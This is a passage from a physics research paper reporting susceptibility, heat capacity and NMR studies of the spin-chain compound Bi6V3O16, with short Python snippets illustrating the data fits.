sequence $\pi/2-\tau-\pi$, the delay $\tau$ between the excitation and refocusing
pulses was set to one rotor period. With this technique, the nuclear dipole-dipole
interactions and the chemical shift anisotropy are averaged
out, and the quadrupolar interaction is partially averaged out. Thus,
MAS-NMR resolves finer details of the spectra. For $T_{1}$,
the rotor speed was $30$~kHz, and the measurements were undertaken
at the frequency of the isotropic shift at a given temperature.
$T_{1}$ was measured by the saturation-recovery method using a saturation
comb of fifty $\pi/2$ pulses followed by a variable delay and an echo sequence
for recording the intensity. At the lowest temperatures, $T_{1}$ measurements were performed under
static conditions to explore the low-temperature behavior down to $4$~K. The frequency
shifts are given relative to the VOCl$_3$ reference.
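The saturation-recovery analysis can be illustrated with a short numerical sketch (not the actual acquisition software): assuming single-exponential recovery $M(t)=M_{0}[1-\exp(-t/T_{1})]$, $T_{1}$ follows from a log-linear fit of the recovery curve.

```python
import numpy as np

def recovery(t, m0, t1):
    # Single-exponential saturation recovery after a saturation comb:
    # M(t) = M0 * (1 - exp(-t / T1))
    return m0 * (1.0 - np.exp(-t / t1))

def fit_t1(t, m, m0):
    # Linearize: ln(1 - M/M0) = -t/T1, then fit the slope by least squares
    y = np.log(1.0 - m / m0)
    slope = np.polyfit(t, y, 1)[0]
    return -1.0 / slope

# Synthetic demo: T1 = 100 ms, delays from 1 ms to 300 ms
t = np.linspace(1e-3, 0.3, 30)
m = recovery(t, m0=1.0, t1=0.100)
t1_est = fit_t1(t, m, m0=1.0)  # recovers 0.100 s on noiseless data
```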
\section{Results and Discussion}
\subsection{Magnetic susceptibility}
\begin{figure}
\begin{centering}
\includegraphics[scale=0.49]{Fig5_Magn_Susc}
\par\end{centering}
\caption{\label{fig:5_CW_Fit}The temperature dependence of the susceptibility
$\chi = M/H$ at $H = 4.7$~T for Bi$_{6}$V$_{3}$O$_{16}$.
Black open circles are $\chi~-~\chi_{0}$ data, the green line
is the low-$T$ Curie-Weiss contribution and the blue solid diamonds show
$\chi~-~\chi_{0}~-~\chi_{Curie}$.
The region of short-range magnetic ordering is indicated by the red arrow.
The red line shows the high-$T$ Curie-Weiss fit in the temperature range
$190-300$~K.
The inset shows the variation of the position of maximum in the magnetic
susceptibility curves with the change in applied field.}
\end{figure}
Magnetic susceptibility $\chi = M/H$ measurements were carried out in
applied magnetic fields of $0.05-14$~T. At high temperatures, $\chi$ follows the
Curie-Weiss law, and with decreasing temperature it shows a broad maximum around $50$~K, which indicates the presence of
short-range magnetic ordering in the system. A Curie-like upturn is
observed at lower temperatures, possibly arising from paramagnetic
impurities. From the Curie-Weiss fit, $\chi(T)=\chi_{0}+C/(T-\theta_{CW})$
in the $T$ range $190-300$ K (see Fig. \ref{fig:5_CW_Fit}),
the $T$-independent $\chi_{0}=8.6\times10^{-6}$
cm$^{3}$/(mole~V$^{4+}$), the Curie constant $C=0.4$ cm$^{3}$K/(mole~V$^{4+}$), and
the Curie-Weiss temperature $\theta_{CW}=-60$~K can be extracted. The negative
value of $\theta_{CW}$ indicates that the dominant exchange couplings
between V$^{4+}$ ions are antiferromagnetic (AFM). We also measured the
electron spin resonance spectrum of the powder ($X$ band,
room temperature; not shown) and found typical $g$ values for a V$^{4+}$ ion [$(g_x, g_y, g_z) = (1.93, 1.91, 1.80)$] with small anisotropy.
From our $\chi$ measurements in Bi$_{6}$V$_{3}$O$_{16}$,
the value of the Curie constant ($C=0.135$ cm$^{3}$K/mole) is $36\%$
of the expected value ($C=0.375$ cm$^{3}$K/mole) for a full $S=1/2$
moment which indicates that only about $1/3$ of the vanadium ions
are magnetic, i.e., in the V$^{4+}$ oxidation state. Earlier
reports~\cite{Ref.19_magnetic measurement-BiV2O5_2013,BiV2O5_Oct 2015_paper}
on similar systems (Bi$_{4}$V$_{2}$O$_{10.2}$ and Bi$_{3.6}$V$_{2}$O$_{10}$)
suggested that V$^{4+}$ and V$^{5+}$ ions prefer the V$1$ and V$2$
sites respectively, namely $90\%$ of the V$1$ site is
occupied by V$^{4+}$ and the rest is filled by the nonmagnetic V$^{5+}$,
meaning that the V$1$ site is shared by the mixed
valence states. Our bulk measurements
have not provided any evidence of such site sharing
in Bi$_{6}$V$_{3}$O$_{16}$.
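The $36\%$ figure above follows from the spin-only Curie constant; a minimal check of this arithmetic (assuming $g=2$, CGS units):

```python
# Spin-only Curie constant C = N_A g^2 mu_B^2 S(S+1) / (3 k_B), CGS units
N_A = 6.02214e23   # Avogadro's number, 1/mol
MU_B = 9.27401e-21 # Bohr magneton, erg/G
K_B = 1.38065e-16  # Boltzmann constant, erg/K
g, S = 2.0, 0.5

C_full = N_A * g**2 * MU_B**2 * S * (S + 1) / (3 * K_B)  # ~0.375 cm^3 K/mol
frac_magnetic = 0.135 / C_full  # measured C per mole V vs full-moment value
```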
From the $\chi(T)$ results, the Van Vleck susceptibility
$\chi_{VV}=\chi_{0}-\chi_{core}=12.4\times10^{-5}$~cm$^{3}$/mole was calculated,
where $\chi_{core}=-11.52\times10^{-5}$~cm$^{3}$/mole~f.u. is the core
diamagnetic susceptibility (here we consider the formula unit
to be Bi$_{2}$VO$_{5.33}$). The low-temperature
upturn in $\chi(T)$ below $20$ K is attributed to the orphan spins
and other extrinsic magnetic impurities.~\cite{Lebernegg2017}
To extract the exact magnetic susceptibility, the temperature-independent
susceptibility (Van Vleck plus the core diamagnetic susceptibility)
and the Curie contribution originating from the extrinsic paramagnetic
impurities and/or orphan spins were subtracted from the experimentally
obtained magnetic susceptibility data (see Fig. \ref{fig:5_CW_Fit}).
The low-temperature Curie-Weiss fit gives $C~=~0.022$~cm$^{3}$K/mole,
$\theta_{CW}$~=~$10.3$~K. From the value of $C$ we find that this contribution is about 6\%
of an ideal $S=\frac{1}{2}$ system. After subtracting this,
we find that the magnetic susceptibility saturates to a fixed value as $T$ tends
towards zero, which is expected for a gapless $S=\frac{1}{2}$ uniform chain.
However, to model the susceptibility with the uniform $S=\frac{1}{2}$ Heisenberg chain,
we rely on the MAS-NMR data below, where the spin susceptibility is
manifested in a more pristine manner.
\begin{figure}
\begin{centering}
\includegraphics[scale=0.32]{Fig6_spin_chain_fit_without_gap}
\par\end{centering}
\caption{\label{fig:6 Mvs H}The experimental magnetization data of Bi$_{6}$V$_{3}$O$_{16}$
vs applied magnetic field at 1.8~K. }
\end{figure}
We have not observed any signature of hysteresis in the $M$ vs $H$ measurements.
The broad maximum observed in our system greatly resembles
what was observed in similar Bi-V-O complexes reported previously.\cite{BiV2O5_Oct 2015_paper,Ref.19_magnetic measurement-BiV2O5_2013}
With the increase in the applied field, we observe that the broad maximum
shifts towards lower temperatures (see the inset of Fig.~\ref{fig:5_CW_Fit}).
In the dependence of the magnetization $M$ on the applied field $H$
(see Fig.~\ref{fig:6 Mvs H}), we have not found any anomaly
or steps indicating the presence of a gap, and the
data agree well with the phenomenological expression
$M^{\text{chain}}(H) = \alpha H + \beta\sqrt{H}$,
with $\alpha = 1.3\times10^{-7}$ and $\beta = 1.65\times10^{-5}$.
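Since $M^{\text{chain}}(H)$ is linear in the coefficients, $\alpha$ and $\beta$ can be extracted by ordinary least squares on the basis functions $H$ and $\sqrt{H}$. An illustrative sketch on synthetic data (not the measured dataset):

```python
import numpy as np

def fit_alpha_beta(h, m):
    # M(H) = alpha*H + beta*sqrt(H) is linear in (alpha, beta):
    # solve least squares with the design matrix [H, sqrt(H)]
    A = np.column_stack([h, np.sqrt(h)])
    coef, *_ = np.linalg.lstsq(A, m, rcond=None)
    return coef  # (alpha, beta)

# Synthetic data generated with the coefficients quoted in the text
h = np.linspace(0.1, 14.0, 50)           # applied field in T
m = 1.3e-7 * h + 1.65e-5 * np.sqrt(h)
alpha, beta = fit_alpha_beta(h, m)       # recovers the input coefficients
```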
\subsection{Heat capacity}
In the temperature dependence of heat capacity $C_{p}$, we did not detect
any long range magnetic ordering (Fig.\ref{fig:7_heat capacity}).
In the plot of $C_{p}/T$ vs $T$, a broad maximum at around $55$~K is observed,
which does not shift under the application of external
magnetic fields up to $9$~T. The magnetic specific heat $C_{m}$ was extracted
by subtracting the lattice contribution using a combination
of Debye and Einstein heat capacities, $C_{Debye}$ and $C_{Einstein}$,
respectively:
$C_{Debye}=C_{d}\times9nR\,(T/\theta_{d})^{3}\int_{0}^{\theta_{d}/T}[x^{4}e^{x}/(e^{x}-1)^{2}]\,dx$,
$C_{Einstein}=3nR\,[\sum_{m}C_{e_{m}}\frac{x_{E_{m}}^{2}e^{x_{E_{m}}}}{(e^{x_{E_{m}}}-1)^{2}}]$,
where $x_{E_{m}}=\hbar\omega_{E_{m}}/(k_{B}T)$.
In the above formulas, $n$ is the number of atoms in the formula
unit, $k_{B}$ is the Boltzmann constant, $\theta_{d}$
is the Debye temperature, and $m$ is an index for an optical
mode of vibration. In the Debye-Einstein model, the relative weights
of the acoustic (Debye) and optical (Einstein) contributions add up
to the total number of atoms in the formula unit. Here we considered the
ratio of the relative weight of the acoustic modes to the sum of the different
optical modes to be $1:n-1$.
We used a single Debye and multiple (three) Einstein functions
with the coefficient $C_{d}$ for the relative weight of the acoustic modes of
vibration and coefficients
$C_{e_{1}}$, $C_{e_{2}}$, and $C_{e_{3}}$ for the relative weights
of the optical modes of vibration.
The experimental data of the system were fitted by excluding the low-temperature
region of $2-115$ K assuming that most of the magnetic part of the
heat capacity is confined within this temperature range.
The fit of our experimental data
to such a combination of Debye and Einstein heat capacities
yields a Debye temperature of $96$~K and Einstein temperatures of
$130$, $295$, and $584$~K with relative weights of $C_{d}$
:$C_{e_{1}}$:$C_{e_{2}}$:$C_{e_{3}}$ = $13:14:48:25$.
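As an illustration of the lattice model above, the Debye and Einstein terms can be evaluated numerically (a sketch with simple trapezoidal quadrature; the Debye temperature of $96$~K and lowest Einstein temperature of $130$~K are the fitted values quoted in the text):

```python
import numpy as np

R = 8.314  # gas constant, J / (mol K)

def c_debye(T, theta_d, n=1):
    # C_Debye = 9 n R (T/theta_d)^3 * Int_0^{theta_d/T} x^4 e^x/(e^x-1)^2 dx
    x = np.linspace(1e-6, theta_d / T, 2000)
    f = x**4 * np.exp(x) / np.expm1(x)**2
    integral = np.sum((f[1:] + f[:-1]) * np.diff(x)) / 2.0  # trapezoid rule
    return 9 * n * R * (T / theta_d)**3 * integral

def c_einstein(T, theta_e, n=1):
    # C_Einstein = 3 n R x^2 e^x / (e^x - 1)^2 with x = theta_e / T
    x = theta_e / T
    return 3 * n * R * x**2 * np.exp(x) / np.expm1(x)**2

# Sanity check: both terms approach the Dulong-Petit limit 3nR at high T
cd = c_debye(3000.0, 96.0)      # Debye term, theta_d = 96 K
ce = c_einstein(3000.0, 130.0)  # Einstein term, theta_E1 = 130 K
```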
\begin{figure}
\begin{centering}
\includegraphics[scale=0.59]{Fig7_heat_capacity}
\par\end{centering}
\caption{\label{fig:7_heat capacity}The temperature dependence of specific
heat of Bi$_{6}$V$_{3}$O$_{16}$
in zero magnetic field; the
blue points are the fit described in the text, and the red line is its
extrapolation. The top inset displays the $C_{p}/T$ vs $T$ plots
in $0$~T (black solid circles) and $9$~T (red open diamonds) magnetic
fields.
The bottom inset shows the magnetic contribution to the heat capacity (black
open circles). The magenta line is the magnetic heat capacity contribution
for the 1D uniform Heisenberg chain; the green data points (right axis) show the change
in entropy $\Delta S$ with $T$. }
\end{figure}
The electronic contribution to the
total heat capacity was neglected since the compound possesses an
insulating ground state. Upon subtracting
the lattice heat capacity with the above parameters, we obtain the
magnetic contribution to the heat capacity $C_{m}(T)$, which, accordingly,
shows a broad maximum around $50$~K. The entropy
change $\Delta S$ was calculated by integrating
the $C_{m}/T$ data (see bottom inset in Fig.~\ref{fig:7_heat capacity}). The entropy
change is about $5.36$~J~K$^{-1}$ (calculated for
1 mole), which is close to the value expected for an $S=\frac{1}{2}$ system
($R\ln2 = 5.76$~J/mole~K). Although the observation of the broad maximum
in the $C_{m}$ vs $T$ data indicates the 1D magnetic interaction
in the system, in the temperature regime
below $30$~K, the magnetic heat capacity is less than 1 \%
of the lattice contribution, which makes the analysis of the magnetic
contribution in this regime highly dependent on the model.
We have also compared $C_{m}$ with the 1D Heisenberg chain
model~\cite{Alternating chain expression paper_Johnston}
(see the magenta line in bottom inset in Fig.~\ref{fig:7_heat capacity}).
The mismatch between our extracted $C_{m}$ and the fit is not surprising:
an accurate estimation of $C_{m}$ is hardly possible
in this temperature range, since the phonon (lattice) contribution amounts
to nearly 99\% of the total heat capacity around the peak of $C_{m}$ at such a relatively high temperature.
The main findings from our heat capacity results are that we did not observe
any magnetic long-range ordering in our system and $C_{m}$ shows the same
trend observed in $\chi$ vs $T$ data. Both these results support the
low-dimensional magnetic behavior in Bi$_{6}$V$_{3}$O$_{16}$.
\subsection{NMR}
\subsubsection{Room-temperature magic angle spinning NMR}
NMR is a powerful local probe to extract the static and dynamic properties
of a spin system and has been extensively used on vanadia systems.~\cite{Volkova}
Fortunately, the room-temperature $^{51}$V MAS-NMR spectrum of Bi$_{6}$V$_{3}$O$_{16}$
is known, consisting of a single line shifted to $-1447$ ppm (with sample spinning
speeds up to 17~kHz).~\cite{Delmaire} In our MAS spectra, we
also observed only one $^{51}$V line, at $-1382$ ppm (spinning
at 30 kHz; see the uppermost spectrum in Fig.~\ref{fig:8_MASNMR_spectra}
and the top spectrum of Fig.~\ref{fig:9 Bi4V2O11 NMR}), confirming
that the $^{51}$V NMR signal originates entirely from only one of the
two available vanadium sites in this system.~\cite{comment1}
As the spectral resolution is much better in $^{51}$V MAS-NMR than
in any bulk measurement or even in the static NMR data, the observation of
a single, strongly shifted, sharp NMR line strongly supports the proposed structure of
Bi$_{6}$V$_{3}$O$_{16}$.
\begin{figure}
\begin{raggedright}
\includegraphics[scale=0.52]{Fig8_MASNMR_comparison}
\par\end{raggedright}
\caption{\label{fig:8_MASNMR_spectra}$^{51}$V MAS-NMR spectra of Bi$_{6}$V$_{3}$O$_{16}$ measured at different temperatures in 4.7-T fixed magnetic field. The main line at the isotropic value of the magnetic shift is highlighted in red, and the rest of the peaks are spinning sidebands at multiples of the spinning frequency (30 kHz) apart from the main line.}
\end{figure}
We have also performed room-temperature MAS-NMR measurements on Bi$_{4}$V$_{2}$O$_{11}$,
the nonmagnetic parent compound of the BiMeVOX family, and compared the
$^{51}$V NMR signals of these two compounds under the same experimental
conditions (Fig.~\ref{fig:9 Bi4V2O11 NMR}). For Bi$_{4}$V$_{2}$O$_{11}$, the $^{51}$V MAS-NMR line
positions are also documented~\cite{Hardcastle,KimGray}, and
our results agree well with the literature. MAS-NMR results published
by Delmaire \textit{et~al.}\cite{Delmaire} showed the detection of four
(three major) structurally different V$^{5+}$ environments.
The MAS-NMR results of Kim and Grey showed the detection of three
different vanadium sites.\cite{KimGray}
Based on the crystal structure analysis of Mairesse\textit{ et~al.}\cite{structural analysis of Bi4V2O11}
and NMR studies of Kim and Grey \cite{KimGray} we can assign the
peak at -423~ppm to the tetrahedral V$^{5+}$ (the V1 site according to the description of
Ref.~\onlinecite{structural analysis of Bi4V2O11}), the peak at -509~ppm to V$^{5+}$
in the trigonal bipyramidal environment (V2), and peaks at -491 and -497~ppm to
the two different fivefold V$^{5+}$ environments. These last two are V3a and V3b according to the report by Mairesse \textit{ et~al.};\cite{structural analysis of Bi4V2O11} however, we cannot differentiate
which one is V3a and which is V3b in our spectrum. The remaining lines with lower intensities are possibly due to V$^{5+}$ ions close to the ends of chains and to the $6a_{m}$ superstructure, which was detected at
a low level in the XRD data of Ref.~\onlinecite{structural analysis of Bi4V2O11}.
The chemical shift, the width, and relative intensity of these components
are given in Table~\ref{tab:4Bi4V2O11 components}.
\begin{figure}
\begin{centering}
\includegraphics[scale=0.8]{Fig9_MASNMR_multiple_lines}
\par\end{centering}
\caption{\label{fig:9 Bi4V2O11 NMR} The top spectrum is the zoomed part of
the central peak of the room-temperature ($305$ K) $^{51}$V NMR
spectrum of Bi$_{6}$V$_{3}$O$_{16}$.
The bottom spectrum is the $^{51}$V
MAS-NMR spectrum of Bi$_{4}$V$_{2}$O$_{11}$. The black line is the
experimental spectrum, which can be well fitted by several Lorentzian
lines, as given by green lines; the red line is the sum of the components.
The spectra were recorded on an AVANCE-III-800 spectrometer at $^{51}$V
resonance frequency of $210.5$ MHz, using a home-built MAS probe for
$1.3$-mm rotors, at $50.1$-kHz sample spinning speed.}
\end{figure}
These observations further confirm that in the
case of Bi$_{6}$V$_{3}$O$_{16}$ the possibility of V$^{4+}$
ions occupying two different sites is clearly ruled out, as this would
create different environments of the V$^{5+}$ ions and,
consequently, additional NMR lines that would be
detected in the MAS-NMR experiments. However, due to the strong
hyperfine field on the V$^{4+}$ ions, the NMR signal originating
from the magnetic vanadium ions could not be detected at elevated
temperatures. A similar scenario was observed in many
other systems such as Cs$_{2}$CuCl$_{4}$,\cite{Cs2CuCl4} BaCuSi$_{2}$O$_{6}$,
\cite{Jaime04,Kramer07,Kramer13} SrCu$_{2}$(BO$_{3}$)$_{2}$,\cite{Kageyama99,Kodama02}
BaV$_{3}$O$_{8}$,\cite{BaV3O8} and Li$_{2}$ZnV$_{3}$O$_{8}$.\cite{Li2ZnV3O8}
The example of BaV$_{3}$O$_{8}$ is most relevant in this context
because BaV$_{3}$O$_{8}$ is also a 1D chain system where the
signal from the magnetic V$^{4+}$ ions was not detected, while the
signal from the nonmagnetic V$^{5+}$ was observed.\cite{BaV3O8}
\begin{table}
\begin{centering}
\begin{tabular}{|c|c|c|c|}
\hline
& Frequency& FWHM&Relative\\&shift (ppm) &(ppm)&intensity (\%)\tabularnewline
\hline
\hline
Peak 1 & $-423$ & $10$ & $15$\tabularnewline
\hline
Peak 2 & $-509$ & $9$ & $29$\tabularnewline
\hline
Peak 3 & $-491$ & $8$ & $11$\tabularnewline
\hline
Peak 4 & $-438$ & $16$ & $8$\tabularnewline
\hline
Peak 5 & $-407$ & $12$ & $2$\tabularnewline
\hline
Peak 6 & $-464$ & $23$ & $8$\tabularnewline
\hline
Peak 7 & $-536$ & $23$ & $4$\tabularnewline
\hline
Peak 8 & $-497$ & $15$ & $23$\tabularnewline
\hline
\end{tabular}
\par\end{centering}
\caption{\label{tab:4Bi4V2O11 components}The chemical shift, width, and
relative intensity of the different vanadium lines in the Bi$_{4}$V$_{2}$O$_{11}$ spectrum. }
\end{table}
\subsubsection{Low-temperature, cryoMAS NMR}
The temperature dependence of $^{51}$V spectra of Bi$_{6}$V$_{3}$O$_{16}$
measured using cryogenic MAS (cryoMAS) technique~\cite{MAS-NMR reference} is shown in
Fig.~\ref{fig:8_MASNMR_spectra}.
Here, we are limited to temperatures above $T=20$~K to maintain the
fast sample spinning, but the obtained values of the isotropic
Knight shift $K$ up to room temperature
are determined very accurately, and they follow the same trend
observed in $\chi(T)$. In the temperature
dependence of $K$, a broad maximum at around $50$~K
is observed, similar to the $\chi(T)$ data, indicating low-dimensional,
short-range magnetic ordering.
As $K(T)$ is a direct measure of spin susceptibility, the following equation can
be written:
\begin{equation}
K(T)=K_{0}+\frac{A_{hf}}{N_{A}\mu_{B}}\chi_{spin}(T)\label{eq:2}~,
\end{equation}
where $K_{0}$ is the temperature-independent chemical shift, $A_{hf}$
is the hyperfine coupling constant, and $N_{A}$ is Avogadro's
number. As long as $A_{hf}$ is constant, $K(T)$ should follow $\chi_{spin}(T)$.
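This relation implies that $K$ plotted against $\chi_{spin}$, with $T$ an implicit parameter, is a straight line of slope $A_{hf}/(N_{A}\mu_{B})$. A minimal sketch of extracting $A_{hf}$ from such a plot (synthetic, noiseless data generated with the values quoted in the text; not the measured dataset):

```python
import numpy as np

N_A = 6.02214e23    # Avogadro's number, 1/mol
MU_B = 9.27401e-21  # Bohr magneton, erg/G

def a_hf_from_slope(k, chi):
    # K = K0 + [A_hf / (N_A mu_B)] * chi: the slope of K vs chi gives A_hf
    slope = np.polyfit(chi, k, 1)[0]
    return slope * N_A * MU_B  # hyperfine coupling in Oe per mu_B

# Synthetic K(chi) line using K0 = -370 ppm and A_hf = 5.64 kOe/mu_B
chi = np.linspace(0.5e-3, 2.0e-3, 20)        # spin susceptibility, cm^3/mol
k = -370e-6 + (5640.0 / (N_A * MU_B)) * chi  # dimensionless shift
a_hf = a_hf_from_slope(k, chi)               # recovers ~5640 Oe/mu_B
```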
We estimated the exchange couplings by fitting the $K(T)$ data with
Eq.~(\ref{eq:2}). Here, $\chi_{spin}$ is the expression for the spin susceptibility
of the $S=\frac{1}{2}$ chain model given by
Johnston \textit{et~al.},\cite{Alternating chain expression paper_Johnston}
which is valid in the whole temperature range of our experiment from
$2$ to $300$~K and in the whole range $0\leqslant\alpha\leqslant1$.
The $K(T)$ data for Bi$_{6}$V$_{3}$O$_{16}$ agree well with the
$S=\frac{1}{2}$ chain model with $K_{0}\simeq-370$~ppm and $A_{hf}=5.64$~kOe/$\mu_{B}$,
with an exchange coupling $J_{1}/k_{B}=113(5)$~K, for both the alternation
ratios $\alpha=1$ (uniform chain) and $\alpha=0.995$ (alternating
chain; Fig.~\ref{fig:10_MASNMR_K_T}).
For the alternation ratio of $\alpha=0.95$,
the zero-field spin gap between the singlet and triplet states according
to the $S=\frac{1}{2}$ alternating chain model is $\Delta/k_{B}\simeq9.52$
K according to Johnston \textit{et~al.}\cite{Alternating chain expression paper_Johnston}\textit{
} and $10.35$ K according to Barnes \textit{et~al.},\cite{spin gap in alternating spin chain}\textit{
} depending on the method of approximation. Our $M$ vs $H$ results up to $14$~T
(see Fig.~\ref{fig:6 Mvs H}) did not show any signature of closing
of the spin gap near the corresponding magnetic fields, which prompts us to conclude
that the uniform chain is indeed the correct model.
It is insightful to compare our results with the recently investigated uniform chain compound
(NO)[Cu(NO$_3$)$_3$] with intrachain coupling $J~=~142(3)$\,K and
long-range magnetic order taking place only at $T_N~=~0.58(1)$\,K, resulting in a
suppression ratio of $f~=~|J|/T_N~=~245(10)$.~\cite{NOCu(NO3)3-1,NOCu(NO3)3-2,NOCu(NO3)3-3}
Even more recently, a study on Cs$_4$CuSb$_2$Cl$_{12}$ reported $J~=~186(2)$\,K and
a spin-Peierls-like phase transition taking place only at $T_{sp}~=~0.70(1)$\,K, resulting in a
suppression ratio of $f~=~|J|/T_{sp}~=~270(7)$.~\cite{Tran2019}
KCuF$_3$ has a relatively large interchain coupling ($J'/J\approx0.01$), yielding
$f~=~390$~K$/39$~K$~=~10$;\cite{Lake2005}\ Sr$_2$CuO$_3$, with a tiny interchain
interaction ($J'/J\approx10^{-5}$), gives $f~=~2200$~K$/5$~K$~=~440$.\cite{SrCu2O3}
For Bi$_{6}$V$_{3}$O$_{16}$ the lowest estimate would be $f~=~108$~K$/2$~K$~\approx~55$,
suggesting that the interchain exchange interactions here are very weak and/or frustrated.
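The suppression ratios compared above are simple arithmetic; a quick check of the quoted numbers (the text rounds the Bi$_{6}$V$_{3}$O$_{16}$ lower bound to $\approx55$):

```python
# f = |J| / T_N: how strongly long-range order is suppressed below the
# intrachain coupling scale (values as quoted in the text)
f_nocu = 142.0 / 0.58     # (NO)[Cu(NO3)3]  -> ~245
f_kcuf3 = 390.0 / 39.0    # KCuF3           -> 10
f_sr2cuo3 = 2200.0 / 5.0  # Sr2CuO3         -> 440
f_bvo = 108.0 / 2.0       # Bi6V3O16 lower bound (no order down to 2 K)
```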
\begin{figure}
\begin{centering}
\includegraphics[scale=0.38]{Fig10_MASNMR_K_T}
\par\end{centering}
\caption{\label{fig:10_MASNMR_K_T}Temperature dependence of the $^{51}$V NMR
shift $K$ of Bi$_{6}$V$_{3}$O$_{16}$
(shown by black
circles) measured using the cryoMAS technique. The black and green lines are fits to
the susceptibility model using Eq.~(\ref{eq:2}) for an $S=\frac{1}{2}$ uniform
chain ($\alpha=1$) and for an alternating chain ($\alpha=0.995$), respectively.
The inset shows the $^{51}$V MAS-NMR shift $K$ of Bi$_{6}$V$_{3}$O$_{16}$
vs $\chi-\chi_{0}-\chi_{Curie}$, where both $\chi(T)$ and $K$ are measured at
$4.7$~T, with temperature being an implicit parameter. The solid line
is the linear fit.}
\end{figure}
The $K$ vs $\chi(T)$ plot is shown in the inset of Fig.~\ref{fig:10_MASNMR_K_T},
where $K$ is the measured shift (in percent) and $\chi-\chi_{0}-\chi_{Curie}$
is the magnetic susceptibility without the $T$-independent and Curie impurity contributions.
The magnetic susceptibility was measured in the same magnetic field of $4.7$~T in
which the NMR measurements were performed.
\subsubsection{Spin lattice relaxation rate $1/T_{1}$}
To study the microscopic properties of 1D Heisenberg antiferromagnets (HAFs), it is necessary
to measure the temperature dependence of the spin-lattice relaxation rate
$1/T_{1}$, which gives information about the imaginary part of the
dynamic susceptibility $\chi(q,\omega)$. As vanadium is an $I=7/2$
nucleus, and to avoid further broadening due to the dipole-dipole interaction,
we studied the temperature dependence of $1/T_{1}$ under spinning
conditions. The temperature dependence of $^{51}$V $1/T_{1}$ is presented
in Fig.~\ref{fig:11_T1}. In the whole temperature range from $300$
down to $20$~K, the recovery of nuclear magnetization is single exponential.
We have not observed any indication of divergence of the relaxation
rate, revealing the absence of any magnetic ordering. Also, no
sign of activated behavior was observed, which shows that
down to $20$~K no dimerization takes place. Down to about $100$~K,
$1/T_{1}$ decreases linearly with temperature; below $100$~K, deviations
from the linear behavior are observed.
Additionally, $1/(KT_{1}T)$ is temperature independent for $100$~K~$\leq~T~\leq~300$~K,
and it varies linearly with $T$ below $100$~K.
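The single-exponential recovery quoted above can be linearized to extract $1/T_1$; the following sketch (with an arbitrary, hypothetical $T_1$, not a measured value) illustrates the procedure on noise-free synthetic data:

```python
import numpy as np

# Saturation-recovery magnetization for a single-exponential process,
# M(t) = M0 * (1 - exp(-t/T1)), as observed here between 20 and 300 K.
# T1_true is an arbitrary illustrative value, not a measured one.
T1_true, M0 = 2.5e-3, 1.0                     # seconds, arbitrary units
t = np.linspace(1e-4, 1e-2, 40)
M = M0 * (1.0 - np.exp(-t / T1_true))

# Linearize: ln(1 - M/M0) = -t/T1, then extract T1 from the slope.
slope, intercept = np.polyfit(t, np.log(1.0 - M / M0), 1)
T1_fit = -1.0 / slope
print(T1_fit)
```

For noisy experimental data, a weighted nonlinear fit of the recovery curve is preferable, but the log-linear form above is a quick consistency check of single-exponential behavior.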
\begin{figure}
\begin{centering}
\includegraphics[scale=0.54]{Fig11_T1-inv}
\par\end{centering}
\caption{\label{fig:11_T1}Temperature dependence of the spin-lattice relaxation
rate ($1/T_{1}$) of Bi$_{6}$V$_{3}$O$_{16}$.
In the top inset the same plot is shown with temperature on a log scale, together with low-$T$
data measured on a static sample (red diamonds). The bottom
inset shows $1/(KT_{1}T)$ vs $T$.}
\end{figure}
We did not observe any signatures of magnetic ordering, and also no
features of spin gap are observed in the temperature dependence of $1/T_{1}$.
Generally, $1/T_{1}$ depends on both uniform $(q=0)$ and staggered
spin fluctuations $(q=\pm\pi/a)$. The uniform component leads to
$1/T_{1}\sim T$, while the staggered component gives $1/T_{1}=$
const.\cite{spin fluctuations-Sachdev} The deviation from the linear behavior
of $1/T_{1}$ below $100$ K presumably indicates that the temperature-independent
part is coming into play which was otherwise absent in the temperature
region above $100$~K. This fact is also reflected in the $1/(KT_{1}T)$
vs $T$ plot, as $1/(KT_{1}T)$ is expected to be constant when the $(q=0)$
contribution dominates. In our $1/(KT_{1}T)$ plot, we observe a clear drop
from the high-$T$ constant value for temperatures $\leq 100$~K.
To observe the temperature dependence of $1/T_{1}$ at lower temperatures, we
stopped spinning and performed NMR measurements on the broad line
in static conditions; $1/T_{1}$ below $15$~K is essentially $T$ independent.
The absolute value of the relaxation rate at low $T$ is much larger than in
cryoMAS-NMR, which seems to indicate that
in the static $T_{1}$ measurements we have started to detect the magnetic
V$^{4+}$ sites, which have a very short relaxation time at low temperatures
(see the top inset in Fig.~\ref{fig:11_T1}). Note that $1/T_{1}$
becoming constant at low temperatures is expected for $S=\frac{1}{2}$ 1D
HAF systems.~\cite{Barzykin} Similar spin-lattice
relaxation behavior has been observed in the uniform $S=\frac{1}{2}$ 1D
chain Ba$_{2}$Cu(PO$_{4}$)$_{2}$.\cite{Ba2Cu(PO4)2-NMR-T1}
\section{Conclusion and Outlook}
We have reported bulk thermodynamic and local NMR studies of the $S=\frac{1}{2}$ V-based
compound Bi$_{6}$V$_{3}$O$_{16}$. All of the measurements
confirm the low-dimensional character of the magnetism in this material.
Upon subtracting the low-temperature Curie-Weiss contribution, the magnetic
spin susceptibility agrees well with the $S=\frac{1}{2}$ uniform Heisenberg chain model.
The magnetic heat
capacity also confirms the existence of low-dimensional magnetism
in the system, even though the lattice part has a dominant
contribution to the total heat capacity, and approximation by any
model is not decisive. In the MAS-NMR experiments on Bi$_{6}$V$_{3}$O$_{16}$,
we observed a single sharp line which confirms that there is no site
sharing between the V$^{4+}$ and V$^{5+}$ ions in this compound.
The spin susceptibility calculated from the MAS-NMR experiments agrees well
with the uniform $S=\frac{1}{2}$ chain model with a dominant exchange coupling
of $J = 113(5)$~K, while the temperature variation of the Knight shift
is consistent with
the findings from the $\chi$ vs $T$ measurements.
Our experimental results from cryoMAS-NMR measurements concur
with the $S=\frac{1}{2}$ uniform chain model over the entire accessible temperature range.
No sign of magnetic ordering
or any feature of spin gap has been observed in the temperature dependence
of $1/T_{1}$.
Bi$_{6}$V$_{3}$O$_{16}$ is one of the very few V-based systems in the category
of uniform spin chains in which no long-range magnetic ordering or singlet
formation was observed above $2$~K, while $J$ is of the order of $100$~K.
An ideal $S=\frac{1}{2}$ spin chain cannot exist in any real material because even an infinitesimal
interchain coupling would give rise to long-range magnetic order at suppressed, but
finite, temperatures.
Future work involving
local probe experiments, e.g., static NMR experiments down to millikelvin
temperatures, neutron diffraction, muon spin resonance, etc.,
is needed to acquire further knowledge about the possible ordering temperature and
the nature of the ordered magnetic structure
of Bi$_{6}$V$_{3}$O$_{16}$, for which a high-quality single crystal is needed.
\section{Acknowledgments}
